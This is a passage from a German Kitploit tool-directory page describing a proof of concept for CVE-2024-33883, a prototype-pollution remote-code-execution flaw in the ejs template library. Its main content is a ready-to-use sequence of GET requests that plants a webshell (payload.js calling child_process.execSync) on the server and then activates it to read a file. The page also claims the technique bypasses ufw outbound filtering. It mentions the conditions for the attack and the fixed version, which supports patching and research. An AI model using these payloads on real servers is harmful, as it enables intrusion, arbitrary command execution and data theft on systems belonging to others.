Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2024-33883 — PoC von CVE-2024-33883, RCE-Sicherheitslücke in ejs. | Kitploit
Tools/GitHubGitHub/grantzile/poc-cve-2024-33883
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationLernen & BildungPayload-Entwicklung
GitHubgrantzile/poc-cve-2024-33883

PoC-CVE-2024-33883

PoC von CVE-2024-33883, RCE-Sicherheitslücke in ejs.

Repository anzeigen
52vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-33883

[email protected], Unzureichende Prototype-Pollution-Validierung führt zu RCE-Ausnutzung

  • Mit Prototype Pollution setze opts.client auf einen truthy-Wert (Bedingung)
  • Dann, wenn render() ausgeführt wird, führt ejs den Wert von opts.escapeFunction als JS-Code aus.

Angreifbarer Code-Bereich

Basiert auf [email protected]

1. ejs/lib/ejs.js - Zeile 580, 636, 637

PoC (Webshell injizieren & aktivieren)

root@kitploit:~
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell
  • Das obige PoC kann das Verwerfen ausgehender Pakete der ufw-Firewall umgehen.

  • Alle Versionen unter 3.1.10 sind für diese Art von Angriff anfällig.

  • Dies ist eine RCE-Sicherheitslücke und sollte nicht auf einem Live-Server missbraucht werden.

Bedingungen für den Angriff

  1. Benötigt Kontrolle über render().
  2. Benötigt Kontrolle über den Prototype-Pollution-Angriffsvektor.
  • Wenn die beiden obigen Bedingungen erfüllt sind, ist ein RCE-Angriff möglich.

Wie kann ich diesen Angriff verhindern?

  • Die behobene Version ([email protected]) ist jetzt verfügbar.
Tool herunterladen